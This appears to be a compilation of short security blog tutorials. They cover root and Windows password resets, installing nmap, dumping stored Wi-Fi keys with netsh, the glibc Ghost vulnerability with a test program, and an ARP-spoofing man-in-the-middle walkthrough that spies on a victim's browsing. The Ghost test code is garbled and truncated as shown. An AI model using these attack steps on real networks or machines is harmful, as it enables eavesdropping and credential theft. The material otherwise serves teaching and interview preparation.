1 – Go to the boot grub menu select option to edit i.e, press the key “e”


2 – Go to the word “ro” as shown in the screen below


3 – Change “ro” to “rw init=/sysroot/bin/sh” as shown below


4 – Now press Control+x to start on single user mode.


5 – Now access the system with this command.

chroot /sysroot

6 – Reset the password.

passwd root

7 – Update selinux information

touch /.autorelabel

8 – Exit chroot


9 – Reboot your system


How to install a latest nmap in Ubuntu/Linux

How to install a latest nmap in Ubuntu/Linux

Go to https://nmap.org/download.html

Copy the link of tar ball: https://nmap.org/dist/nmap-7.12.tar.bz2 and use “wget” to download it

# wget https://nmap.org/dist/nmap-7.12.tar.bz2

# tar xjvf nmap-7.12.tar.bz2

# cd nmap-7.12

# ./configure

Note: If you don’t have compiler installed follow the below two steps

#apt-get update

# apt-get install build-essential

# make

# make install

# ./nmap –version


Hacking Wifi- Accespoints Passwords stored in Windows 7 or Windows 8 PC

Prerequisite: You should have access to the command prompt with Administrator privileges

Open Command Promt


Command: netsh wlan show profiles

Description: The above command gives us the list of access points our system is connected to, with their names.


Command: netsh wlan show profiles <ACCESS POINT NAME> key=clear

Description: The above command gives us the password of the selected access point’s password in clear text format

under the field “key content”

How to secure against Glibc Ghost Vulnerability: CVE-2015-0235

CVE-2015-0235 Ghost (glibc gethostbyname buffer overflow) Vulnerability is serious cause for all Linux servers. This vulnerability leveraged to execute remote and code execution on the victim Linux server. The vulnerability found By Qualys Researcher and patched in GNU.

What is the cause ?

The bug is in __nss_hostname_digits_dots() function of function of the GNU C Library (glibc), and location of the path is file for non-reentrant version is nss/getXXbyYY.c , which is used by the gethostbyname(). The vulnerability can be exploited both via locally and remotely. In order to trigger this vulnerability attacker needs to be able to feed specially crafted ‘host name’ to the service. And service needs to process it without validating it first.

Following are the potentially exploitable services


You can find the list of services which are rely on the GNU C libraries by executing following command

lsof | grep libc | awk '{print $1}' | sort | uni

Fix for Centos/RHEL/Fedora 5,6,7

yum update glibc 
sudo restart

Fix for Ubuntu

sudo apt-get update
sudo apt-get dist-upgrade
sudo restart

Linux is being haunted by a G-G-G-GHOST vulnerability



There is a new remote vulnerability in glibc under CVE-2015-0235. The bug is in __nss_hostname_digits_dots() function, which is used by the gethostbyname().

This vulnerability in GNU C Library (glibc), allows remote or local actors to execute arbitrary code under the privilege of user running the function gethostbyname(). Qualsys, who reported the bug was able to remotely exploit this bug in an Exim mail server.

All the glibc updates for CentOS 5, 6 and 7 have now been released and are currently being distributed to mirrors.

If your glibc version is lower than 2.18, you should assume that your server is vulnerable. You can check the version as given below:

[root@linux5 ~]# find /lib/ -name libc.so.*

[root@linux5 ~]# /lib/libc.so.6
GNU C Library stable release version 2.12, by Roland McGrath et al.
Copyright (C) 2010 Free Software Foundation, Inc.

Alternatively, you can use the below vulnerability test program released by Qualsys. (Disclaimer: Use this program at your own risk. We execute these programs under a restricted environment.)

Save the following into a file named ghost.c

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY “in_the_coal_mine”

struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { “buffer”, CANARY };

int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;

/*** strlen (name) = size_needed – sizeof (*host_addr) – sizeof (*h_addr_ptrs) – 1; ***/
size_t len = sizeof(temp.buffer) – 16*sizeof(unsigned char) – 2*sizeof(char *) – 1;
char name[sizeof(temp.buffer)];
memset(name, ‘0’, len);
name[len] = ”;
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

if (strcmp(temp.canary, CANARY) != 0) {
if (retval == ERANGE) {
puts(“not vulnerable”);
puts(“should not happen”);

Compile it using:
# gcc ghost.c -o ghost

Run it using:
# ./ghost

You’ll see an output saying “vulnerable” if your server is affected by the bug.

It is quite maddening to think this vulnerability has existed for over 14 years. Even crazier is that it was fixed in 2013, but not properly categorized as a security issue, leaving it to haunt some distributions.

Man In The Middle Attack Using ARP Spoofing

Implementing the MITM using ARP Spoofing using Back-Track 5 or Kali Linux

Tools used:-





Tools description in brief:-

Nmap:- Used to discover the devices on the network

Arpspoof:- We use it twice

1. To lie to the Gateway about the MAC address of victim

MAC Address of Victim is that of Back-Track’s

2. To lie to the Victim about the MAC address of Gateway

MAC Address of Gateway is that of Back-Track’s

Driftnet:- Displays the Graphics, that Victim browses over Internet

Urlsnarf:- Gives the details of URLs, that Victim visits

Overview of the MITM Attack:-

Actual Topology

Before attack

After the Attack :-

1. In XP the Gateway MAC Address is changed to the MAC Address of Backtrack5

2. In Gateway the XP MAC Address is changed to the MAC Address of Backtrack5

After attack

In XP Machine:-

Step1: To see the IP Address: ipconfig


Step2: To see the ARP Cache: arp –a


Step3: To see the IP Address and MAC Address: ipconfig /all


In Backtrack5 Machine:-

Nmap Scan for choosing Victim:


Step1: To get the IP Address from DHCP Server: dhclient eth0


Step2: To see the IP Address & MAC Address: ifconfig eth0


Step3: To Route the traffic through Backtrack we have to enable the forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward


Step4: To tell/lie to Victim XP that Gateway is at Backtrack MAC Address:

arpspoof –i eth0 –t <Victim IP> <Gateway IP>

Step5: Opening Wireshark to see the network traffic: wireshark



Step6: To tell/lie to Gateway that Victim XP is at Backtrack MAC Address:

arpspoof –i eth0 –t <Gateway IP> <Victim IP>



Step7: You can now see the spoofed ARP Cache in Victim-XP


Step8: To view the victim’s web surfing content in Backtrack5:

driftnet -i eth0 -> shows the graphics the user browses

urlsnarf -i eth0 -> shows urls visited by victim


Step9: Open Web-browser in XP and go to some site for example: www.google.com


Driftnet showing the images of victim’s browsing content in Backtrack5:


Urlsnarf showing the urls visited by victim in Backtrack5:

Possible Interview Questions:-

What is Man In The Middle Attack?

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

What is ARP?

The Address Resolution Protocol (ARP) is a widely used protocol for resolving network layer addresses into link layer addresses.

When an Internet Protocol (IP) datagram is sent from one host to another on a local area network, the destination IP address must be converted into a MAC address for transmission via the data link layer. When another host’s IP address is known, and its MAC address is needed, a broadcast packet is sent out on the local network. This packet is known as an ARP request. The destination machine with the IP in the ARP request then responds with an ARP reply, which contains the MAC address for that IP.

ARP is a stateless protocol. Network hosts will automatically cache any ARP replies they receive, regardless of whether or not they requested them. Even ARP entries which have not yet expired will be overwritten when a new ARP reply packet is received.

What is ARP Spoofing?


ARP spoofing is a technique whereby an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate the attacker’s MAC address with the IP address of another host (such as the default gateway), causing any traffic meant for that IP address to be sent to the attacker instead.


Resetting the password in Windows with Hiren Boot CD

Change your Boot options to boot from CD drive after inserting Hiren Boot CD


After that you’ll get the screen as below, in which you have to scroll down to

Offline NT/2000/XP/Vista/ Password Changer

5 after


By default it selects the option number for where windows is installed if not select option number the disk or partition where the windows installation is and then → PRESS ENTER

6 dupe orig


By default it selects the option number for: Path & Registry Files → PRESS ENTER

7 press enter


By default it selects the option number for: Password Reset → PRESS ENTER

8 press enter to choose option 1 for password reset


By default it selects the option number to: edit user data and passwords → PRESS ENTER

9 press enter


From the list of users displayed choose the user of your choice and write the user name

after: “[Administrator]”  and then → PRESS ENTER

10 type the user name from the list above to clear his password


Type “1” to clear the user’s password, without inverted commas (“”) → PRESS ENTER

11 choose option 1 to clear the user's password


Here the user’s password is removed or cleared or erased, so you can login directly once the process is completed.


Type “!” to quit, without inverted commas (“”) and then → PRESS ENTER

12 type ! to quit


Type “q” to quit, without inverted commas (“”) and then → PRESS ENTER

13 type q to quit and save the changes


Type ”y” without inverted commas (“”)  to save the changes and then → PRESS ENTER

14 type y to save changes


Type “n” without inverted commas (“”) to end the process and then → PRESS ENTER

15 type n to end the process


Remove the Hiren Boot CD and press Ctrl+Alt+Delete


As explained below the step6, now you’ll logon directly without being asked for password.

So now you can change the password

Note: Right Click on the image & open link in new tab.